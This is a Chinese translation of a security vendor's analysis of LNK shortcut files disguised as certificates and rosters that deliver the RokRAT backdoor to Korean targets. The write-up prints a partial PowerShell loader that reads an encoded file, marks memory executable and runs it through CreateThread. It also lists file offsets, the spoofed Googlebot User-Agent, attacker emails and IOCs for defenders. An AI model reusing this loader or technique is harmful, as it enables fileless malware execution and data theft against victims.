[译文] 恶意代码分析：2.LNK文件伪装成证书传播RokRAT恶意软...

tna

这是作者新开的一个专栏，主要翻译国外知名安全厂商的技术报告和安全技术，了解它们的前沿技术，学习它们威胁溯源和恶意代码分析的方法，希望对您有所帮助。当然，由于作者英语有限，会借助LLM进行校验和润色，最终结合自己的安全经验完成，还请包涵！

前文介绍了文本编辑器notepad++如何被感染的，通过恶意链接引导用户下载恶意的编辑器，并分析其恶意行为。这篇文章将翻译一篇LNK文件发起的恶意攻击，主要是LNK文件伪装成证书执行RokRAT恶意软件，并利用Powershell命令发起无文件攻击和执行相关行为。基础性技术文章，希望您喜欢！

文章目录：
一.前言


二.攻击机理分析


三.恶意软件行为分析及IOCs


四.总结



原文标题：《LNK File Disguised as Certificate Distributing RokRAT Malware》

原文链接：https://asec.ahnlab.com/en/65076/

文章作者：yeeun [ASEC]

发布时间：2024年5月7日

文章来源：https://asec.ahnlab.com/

前文系列：
[译文] LLM安全：1.黑客如何读取您与ChatGPT或微软Copilot的聊天内容

[译文] 恶意代码分析：1.您记事本中的内容是什么？受感染的文本编辑器notepad++

[译文] 恶意代码分析：2.LNK文件伪装成证书传播RokRAT恶意软件（含无文件攻击）

声明：本人坚决反对利用工具或渗透技术进行犯罪的行为，一切犯罪行为必将受到严惩，绿色网络需要我们共同维护，更推荐大家了解它们背后的原理，更好地进行防护。该系列主要翻译外文博客为主，旨在为大家提供他们的攻防视角。

一.前言

AhnLab安全情报中心（ASEC，AhnLab SEcurity intelligence Center） 已经确认了持续分发异常大小的快捷方式文件（.LNK），这些文件正在传播具有后门的恶意软件。他们发现该种基于快捷方式文件（.LNK）的恶意软件主要针对韩国用户，特别是与朝鲜相关的用户。


已确认的LNK文件名如下：
   National Information Academy 8th Integrated Course Certificate (Final).lnk
   国家信息学院第八届综合课程证书（最终）.lnk

    Gate access roster 2024.lnk
    2024年门禁准入名单.lnk

   Northeast Project (US Congressional Research Service (CRS Report).lnk
   东北项目（美国国会研究服务 CRS报告）.lnk

   Facility list.lnk
   设施列表.lnk

下图展示已确认的LNK文件属性。


二.攻击机理分析
已确认的LNK文件包含一个通过CMD执行的PowerShell命令，并且它们的类型类似于去年发布的文章中发现的类型。
    RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)
    通过LNK文件（*.lnk）传播的RokRAT恶意软件：RedEyes (ScarCruft)

这种类型的恶意软件有一个显著特点：它在LNK文件中包含了合法的文档文件、脚本代码和恶意PE数据。
    legitimate document files
    script code
    malicious PE data

下图展示了LNK文件中包含的PDF文件和脚本代码。






RokRAT恶意软件的简化操作过程如下所示，是一种比较常见的LNK攻击：
    通过Email发起鱼叉式钓鱼攻击，包括恶意LNK文件（可执行Powershell）

    整个LNK文件包含：正常PDF文件、viwer.dat、search.dat、find.bat

    发起RokRAT无文件攻击，利用云端API收集用户信息

更详细的描述如下：

（1）当LNK文件被执行时，它会运行PowerShell命令来创建并执行一个合法的文档文件。 如下图所示，创建了一个韩文的合法文档，旨在干扰被攻击者。



（2）随后，它在%public%文件夹中创建了3个文件。 此步骤中所创建文件的名称和特性如下：

1. 文件名       LNK文件中的位置            特征
   
2. viewer.dat  0x2BC97 (size:0xD9402)  Encoded RokRAT malware（编码RokRAT恶意软件）
   
3. search.dat  0x105099 (size:0x5AA)    Executes viewer.dat file（执行viewer.dat文件）
   
4. find.bat      0x105643 (size:0x139)    Executes search.dat file（执行search.dat文件）

复制代码

（3）第一个执行项是“find.bat”，它通过PowerShell代码运行“search.dat”。接着，“search.dat”以无文件攻击的方式读取并执行“viewer.dat”文件。

关键代码如下所示：

1. $exePath=$env:public+'\'+'viewer.dat';
   
2. $exeFile = Get-Content -path $exePath -encoding byte;
   
3. [Net.ServicePointManager]::SecurityProtocol = [Enum]::ToObject([Net.SecurityProtocolType], 3072);
   
4. $k1123 = [System.Text.Encoding]::UTF8.GetString(34) + 'kernel32.dll' + [System.Text.Encoding]::UTF8.GetString(34);
   
5. <중략>
   
6. $byteCount = $exeFile.Length;
   
7. $buffer = $b::GlobalAlloc(0x0040, $byteCount + 0x100);
   
8. $old = 0;
   
9. $a90234sb::VirtualProtect($buffer, $byteCount + 0x100, 0x40, [ref]$old);
   
10. for($i = 0;$i -lt $byteCount;$i++) {
    
11.   [System.Runtime.InteropServices.Marshal]::WriteByte($buffer, $i, $exeFile[$i]);  };
    
12. $handle = $cake3sd23::CreateThread(0, 0, $buffer, 0, 0, 0);
    
13. $fried3sd23::WaitForSingleObject($handle, 500 * 1000);

复制代码

（4）最终执行的“viewer.dat”数据即是RokRAT恶意软件，它是一种后门类型的恶意软件，能够利用云API收集用户信息，并根据威胁攻击者的命令下执行各种恶意行为。
       收集到的信息通过如pCloud、Yandex和DropBox等云服务传输到威胁攻击者的云服务器中。此时，请求头中的UserAgent伪装成Googlebot，所使用的云URL如下表所示。

       User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)



三.恶意软件行为分析及IOCs

该恶意软件根据威胁行为体（behaviors）或攻击者的命令可以执行的恶意行为包括：
    执行cmd命令

    收集目录信息

    删除启动项文件夹中的特定文件（包括VBS、CMD、BAT和LNK扩展名）

    收集启动文件夹列表、%APPDATA%文件夹列表以及最近使用的文件列表

    收集PC信息（系统信息、IP、路由器信息等）

此外，还可以执行其他的恶意行为，并且收集到的信息在上传至攻击者的云服务器之前，会先存储在%TEMP%文件夹中。在分析过程中所识别出的攻击者的电子邮件地址如下。
    tanessha.samuel@gmail[.]com

    tianling0315@gmail[.]com

    w.sarah0808@gmail[.]com

     softpower21cs@gmail[.]com

由于此类事件频繁发生，ASEC将通过其官方博客持续分享有关恶意快捷方式文件传播的信息。特别需要注意，近年来不断发现“针对朝鲜半岛统一、军事和教育相关的个人或团体恶意软件”，因此，我们需要格外谨慎。

[File Detection]

    Dropper/LNK.S2343 (2024.04.12.03)

    Trojan/BAT.Runner (2024.04.12.00)

    Trojan/Script.Generic (2024.04.12.00)

    Data/BIN.EncPe (2024.04.12.00)

    Infostealer/Win.Agent.R579429 (2023.05.05.01)


[IoC]

    b85a6b1eb7418aa5da108bc0df824fc0

    358122718ba11b3e8bb56340dbe94f51

    35441efd293d9c9fb4788a3f0b4f2e6b

    68386fa9933b2dc5711dffcee0748115

    bd07b927bb765ccfc94fadbc912b0226

    6e5e5ec38454ecf94e723897a42450ea

    3114a3d092e269128f72cfd34812ddc8

    bd98fe95107ed54df3c809d7925f2d2c


四.总结
写到这里，这篇文章就介绍完毕，基础性文章，希望对您有所帮助。